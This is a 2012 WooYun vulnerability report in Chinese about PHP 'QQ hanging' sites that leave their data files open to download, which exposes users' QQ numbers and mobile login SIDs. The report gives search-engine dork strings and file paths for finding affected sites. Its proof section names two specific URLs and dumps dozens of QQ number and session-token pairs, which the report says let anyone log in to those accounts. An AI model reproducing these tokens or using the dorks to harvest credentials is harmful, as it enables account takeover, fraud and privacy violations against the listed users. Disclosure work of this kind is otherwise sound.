当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-010020

漏洞标题:PHP在线挂QQ个人隐私泄漏

相关厂商:小应用

漏洞作者: Volltin

提交时间:2012-07-23 10:59

修复时间:2012-07-23 10:59

公开时间:2012-07-23 10:59

漏洞类型:默认配置不当

危害等级:低

自评Rank:5

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-23: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-07-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

PHP在线挂QQ系统个人隐私泄漏,导致QQ会被随意登陆。

详细说明:

PHP在线挂QQ个人隐私泄漏,可导致通过手机腾讯网SID登录QQ,进而进行诈骗、社工等。
目前很流行的一个系统,因为对数据文件权限设置不当,可以随意下载,获得用户QQ的SID,
众所周知,有了QQ号码和SID,就能在手机腾讯网上登录QQ。
目前有两种使用比较广泛的:其搜索引擎关键词分别是:
1."本站现在24小时全天挂机 inurl:look.php"
2."24小时挂Q系统 挂Q状态查询 提取SID码"
数据文件分别是:
1.xx.com/gq_date.dat
2.xx.com/db.dat
当然有一些站也做了修改,权限设置等这个漏洞就无效。

漏洞证明:

http://tcsq.by.76at.com/gq_date.dat

tcsq,2215335746,AYHGwqNTPBHeLcaZyImus4ui,2012-02-17 13:35:29 ;tcsq,592600540,AeHSLAtdKAJs09U3qr3ayNai,2012-02-17 13:35:54 ;tcsq,822481102,AX2x0xCTKjAmulH3WNynLOyi,2012-02-17 13:36:28 ;tcsq,1113435604,AU_pjPX2eD4ERB3sHATBh0ai,2012-02-17 13:36:51 ;tcsq,1275285347,AdfZHos8ql-NPBBeJKPdQbCi,2012-02-17 13:37:04 ;tcsq,754540252,Ae5lBJVpuN4RHgo9U9xoyICi,2012-02-17 13:37:25 ;tcsq,1914269127,AYEmFi-79W4EFrOLkpNibqmi,2012-02-17 13:38:19 ;tcsq,1834188441,ARZKhhFpFxSmRUUuiQYny6Ki,2012-02-17 13:39:28 ;tcsq,1970536142,AXQIH9RCSoWvtctHxPxY5g2i,2012-02-17 13:39:48 ;tcsq,1963513081,AZNu1rW34zkeixfsYmoA2nmi,2012-02-17 13:40:06 ;tcsq,1538885353,AUxXJ-X08hZLdLGByxCMA9Si,2012-02-17 13:40:24 ;tcsq,1091071600,AUmdMWqvQPADRoj-nfnMuCui,2012-02-17 13:40:47 ;tcsq,1147375552,AXlrEOAj3K4Jb4W7LDqrlIai,2012-02-17 13:41:03 ;tcsq,1393317690,AQopljryHnzCWtFWIJCEkk6i,2012-02-17 13:41:15 ;tcsq,2232334876,AcbBgA0k9IF96ZqRr-nWzlyi,2012-02-17 13:41:31 ;tcsq,1445447629,AYpMn0D0FGMD4X-3e9RWFaqi,2012-02-17 13:42:33 ;tcsq,1440141034,AXxGKDaf8oypzDob3XvlK56i,2012-02-17 13:42:47 ;tcsq,798003012,AbXEdvRCLPqqS_wMp9kJfbei,2012-02-17 13:43:04 ;tcsq,804616319,Ab-BCISQA7Ls1zgLfQ3BXlei,2012-02-17 13:43:16 ;tcsq,281994546,Aajkmw2n_TTYOUi7EJJPugmi,2012-02-17 13:43:32 ;754540252,287206447,AfOABAcJOJD2-Utd-MooWRai,2012-02-17 13:44:06 ;754540252,184421570,AfkWC73cMypAeee__CsWXRii,2012-02-17 13:44:23 ;754540252,799892085,ASYdV2HWOzFw83lFw6Wvn0Gi,2012-02-17 13:44:38 ;754540252,352648731,ARe39EqqSHJ-6RQrProu1Oui,2012-02-17 13:45:01 ;754540252,442685927,Abv3RCSdNXr1FP9-aWWi11ui,2012-02-17 13:45:14 ;


http://shenyaw.cpanel.my/db.dat

375988497,884572452,nqqchatMain&sid=AbGmHyZDy7Cbd3wS3ewE6xhL&myqq,2011-12-13 11:37:07 ;375988497,870699770,Ac2MMg48qf29dLtt0O2ItXWF&myqq,2011-12-15 11:07:21 ;375988497,188750301,AXIAK1AN9LRzW95xlmdip2PY&myqq=188750301,2011-12-21 23:25:08 ;375988497,572505757,AaZhh6Mb4nSCUna_0sCMCOPc&myqq=572505757,2011-12-21 23:40:39 ;375988497,94536422,AdVASRHRsYhf0zXd8R9dBbvd&myqq=94536422,2011-12-21 23:46:34 ;375988497,1265652343,AXZh51KwLRRB9desFtvIiqBU&myqq=1265652343,2011-12-22 09:47:37 ;375988497,1265652347,nqqchatMain&sid=AforYi1qz2g4buW9tej634kY&myqq=1265652347,2011-12-22 09:56:11 ;375988497,993425822,ARNB5SsvRQM9_eKA1VrZOIzX,2012-01-11 19:00:05 ;375988497,343625052,AcXB3Fc2f9OIXEhFy4lG9cVN,2012-01-11 19:01:19 ;375988497,541269758,AR6s7wl8pH6WGB_GJKNoB0NN,2012-01-11 19:01:57 ;375988497,1204366758,AQ8ePajtz-wn9PQtsVPeOXQ5,2012-01-20 15:24:03 ;375988497,812851168,AVSS62mNZ4sahkAVCi580DHD,2012-01-24 16:27:27 ;375988497,896221565,AXE6RiXbjCXPvkfvQ_8N4LpV&aid,2012-02-5 09:26:56 ;375988497,283331368,AY-NEumDCHdxgqAyh77ryfPZ,2012-02-8 00:08:59 ;375988497,549861999,ATIuGKvZXW_TrUSTXW4V2rdu,2012-02-8 11:50:43 ;375988497,277910488,Ad1PlaxZC-xo7yZEsTri9BUZ&myqq=277910488,2012-02-9 10:01:10 ;375988497,594500226,ATPbC0HlWopmKplnbIlja3a8,2012-02-19 10:22:22 ;375988497,993401021,ARCA9App5QpZ0pXSok4TPh69,2012-02-19 10:23:35 ;375988497,859900328,AWSs3oKcwomQV975fbjq84gF,2012-03-12 21:47:12 ;375988497,1045125801,ARu3qWs-d2YhWfY_ZC9wgMA8,2012-03-13 02:21:22 ;

修复方案:

改名,最直接的是禁止访问

版权声明:转载请注明来源 Volltin@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)